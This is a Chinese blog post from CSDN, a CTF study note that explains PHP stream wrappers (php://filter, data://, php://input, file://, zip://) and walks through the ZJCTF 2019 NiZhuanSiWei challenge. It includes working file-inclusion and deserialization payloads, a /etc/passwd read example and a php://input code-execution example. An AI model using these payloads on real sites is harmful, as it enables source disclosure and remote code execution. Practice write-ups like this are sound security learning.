ctf之php伪协议的使用

最新推荐文章于 2024-05-24 22:45:00 发布
最新推荐文章于 2024-05-24 22:45:00 发布
阅读量1.1k 收藏 6
点赞数 1
分类专栏: 网安小笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jdhhehk_123/article/details/130781989
版权

文章目录

1. 知识点

1.1 php://filter

获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。

1.1.1 过滤器

1.1.1.1 字符串过滤器

该类通常以string开头,对每个字符都进行同样方式的处理。

  • string.rot13

一种字符处理方式,字符右移十三位。

  • string.toupper

将所有字符转换为大写。

  • string.tolower

将所有字符转换为小写。

  • string.strip_tags
    这个过滤器就比较有意思,用来处理掉读入的所有标签,例如XML的等等。在绕过死亡exit大有用处。
1.1.1.2 转换过滤器

对数据流进行编码,通常用来读取文件源码。

  • convert.base64-encode & convert.base64-decode

base64加密解密

  • convert.quoted-printable-encode & convert.quoted-printable-decode

可以翻译为可打印字符引用编码,使用可以打印的ASCII编码的字符表示各种编码形式下的字符。

1.1.1.3 压缩过滤器

用到的两个相关过滤器:zlib.deflate(压缩)和 zlib.inflate(解压)。zilb是比较主流的用法,至于bzip2.compress和 bzip2.decompress工作的方式与 zlib 过滤器大致相同。

1.1.1.4 加密过滤器

mcrypt.*和 mdecrypt.*使用 libmcrypt 提供了对称的加密和解密。

1.2 data://

数据流封装器,以传递相应格式的数据。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。

1.3 file://

用于访问本地文件系统,并且不受allow_url_fopen,allow_url_include影响
file://协议主要用于访问文件(绝对路径、相对路径以及网络路径)
比如:http://www.xx.com?file=file:///etc/passsword

1.4 php://

在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用
php://作用为访问输入输出流

1.5 php://input

php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。

例如:
http://127.0.0.1/cmd.php?cmd=php://input
POST数据:<?php phpinfo()?>
注意:
当enctype="multipart/form-data"的时候 php://input` 是无效的

遇到file_get_contents()要想到用php://input绕过。

1.6 zip://

zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。从而实现任意代码执行。

前面的知识点太烦了,还是贴一点做题记录罢

2. 题目

直接复制每个题目名就可以搜到了

2.1 [ZJCTF 2019]NiZhuanSiWei 1

在这里插入图片描述
打开题目,发现就是个代码审计的题目。
首先需要传入text,file,password等参数
text这个参数直接传入welcome to the zjctf就行了
构造payload:

?text=data://text/plain,welcome to the zjctf

或者:

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

提示里面有一个useless.php文件,我们用php伪协议来看看里面有些什么:

file=php://filter/read=convert.base64-encode/resource=useless.php

在这里插入图片描述
对下面的字符串解码看看:
在这里插入图片描述
接着对Flag序列化:
运行下面的代码:

<?php  

class Flag{  //flag.php  
    public $file="flag.php";  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  


$passwords = new Flag();

echo serialize($passwords);
?>

运行后结果为:
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

最终构造的payload为:

http://03748dff-ca86-4f02-9ce0-65db8464d293.node4.buuoj.cn:81/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;}

在最后显示的界面上查看源码:
在这里插入图片描述
flag就在里面了

一只菜鸟呀
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
【网络安全 | CTF】攻防世界 fileclude 解题详析(php伪协议
等风来
07-31 4361
代码功能:检查通过GET请求传递的两个参数"file1"和"file2"。如果这两个参数都存在且非空,它将读取"file2"文件的内容,如果内容等于"hello ctf",则会执行"file1"文件。对于file1,我们可以使用 convert.base64-encode 过滤器来读取位于 flag.php 文件中的内容,并将其转换为 base64 编码的形式。php://input 是一个 PHP 的内置流(stream)封装器,用于从请求的正文(body)中获取原始的输入数据。
ctf中常用的PHP伪协议
weixin_35756637的博客
01-02 710
CTF比赛中,常常会使用PHP伪协议来绕过服务器的安全限制或者执行本不应该执行的操作。 PHP伪协议有几种常见的形式: data: 协议 这种形式的PHP伪协议通常用于在HTML中嵌入PHP代码,例如: <imgsrc="data:image/png;base64,PHP_CODE_HERE"> php: 协议 这种形式的PHP伪协议通常用于在浏览器中执行PHP代码,例如:...
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
最新发布
2401_84208172的博客
05-24 1116
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
Web安全之PHP伪协议漏洞利用,以及伪协议漏洞防护方法
Scalzdp的专栏
11-13 2020
单纯看伪协议利用与之前的文件包含漏洞及其相似,但是在真实环境中是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程中对于使用伪协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
php伪协议
weixin_60719780的博客
01-27 4456
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
PHP伪协议
m0_75178803的博客
04-02 1160
可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致任意文件读取协议参数:常用的有。
关于 CTFphp 考点与绕过那些事的总结
Welcome To Myon'Blog !
03-04 2280
_POST //获取post数据,是一个字典$_GET //获取get数据,是一个字典$_COOKIE //获取cookie数据$_SESSION //获取session数据$_FILES //获取上传的文件$_REQUEST //获取$_GET, $_POST, $_COOKIE中的数据$_SERVER //用户和服务器的基本信息数据库$_ENV //环境数据$GLOBALS //所有全局变量。
CTF PHP离线chm文档
08-09
CTF PHP离线chm文档
CTF之GIF图片分离工具
02-23
misc方向直接GIF图片分离
CTF之二维码扫描.7z
12-02
这个"CTF之二维码扫描.7z"压缩包显然与CTF比赛中的一个环节有关,即二维码扫描。二维码在现代生活中无处不在,它们可以存储各种信息,如网址、文本、联系人信息等。在CTF竞赛中,二维码可能被用作隐藏线索或加密信息...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
1. **PHP注入**:这是最常见的Web安全漏洞之一,攻击者可以通过输入恶意数据来控制或操纵PHP代码的执行。了解如何防范SQL注入、命令注入和文件包含注入至关重要。 2. **变量和作用域**:理解PHP中的变量如何工作,...
CTF 离线C PHP python 汇编函数查询 chm电子书合集
10-06
PHP在Web开发领域广泛使用,因此在Web安全相关的CTF挑战中扮演重要角色。PHP函数查询手册能让你掌握PHP内置函数的应用,理解它们可能的安全漏洞,提高解题效率。 4. **Python函数查询**: Python以其简洁的语法和...
php伪协议读取源码,php伪协议-php://
weixin_29466397的博客
03-19 2167
php伪协议php伪协议,事实上是其支持的协议与封装协议。而其支持的协议有:file:// — 访问本地文件系统http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsphp:// — 访问各个输入/输出流(I/O streams)data:// — 数据(RFC 2397)glob:// ...
BUUCTF-伪协议-jadx
m0_64180167的博客
04-01 160
WEB。
ctf攻防世界 WEB题:php_rce
qq_30889301的博客
05-09 925
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
CTF积累】两个绕过的题
qq_41369524的博客
12-10 1005
第一层绕过:===全等于让substr和md5函数同时报错,返回的就都是nul,从而实现全等于是传参传入数组形势:path[]=1接着第二层绕过:正则匹配^control$:以control开头且结束绕过方法:换行符%0a在结尾不会被识别从而第三层:看到 $getflag= file_get_contents( $b);
CTF中的PHP特性
qq_45086218的博客
02-26 4131
文章目录正则表达式元字符模式修正符preg_match()数组绕过换行绕过intval()字符绕过科学计数法进制转换小数点绕过strpos()md5强类型比较弱类型比较md5碰撞file_put_contents()in_array()优先级 本文以ctf.show网站题目为例,总结ctf中的php特性 正则表达式 元字符 模式修正符 preg_match() 数组绕过 preg_match()只能处理字符串,当传入的subject是数组时会返回false if(preg_match("/[0-9]/
ctf php伪协议
10-15
好的,关于您的问题,我可以简单地解释一下。CTF中的PHP伪协议是一种特殊的协议,可以在PHP代码中使用,用于执行一些特殊的操作,例如读取文件、执行系统命令等。它的语法类似于URL,以"php://"开头,后面跟着一些参数和值。但是需要注意的是,使用PHP伪协议可能存在安全风险,因此在实际应用中需要谨慎使用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一只菜鸟呀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值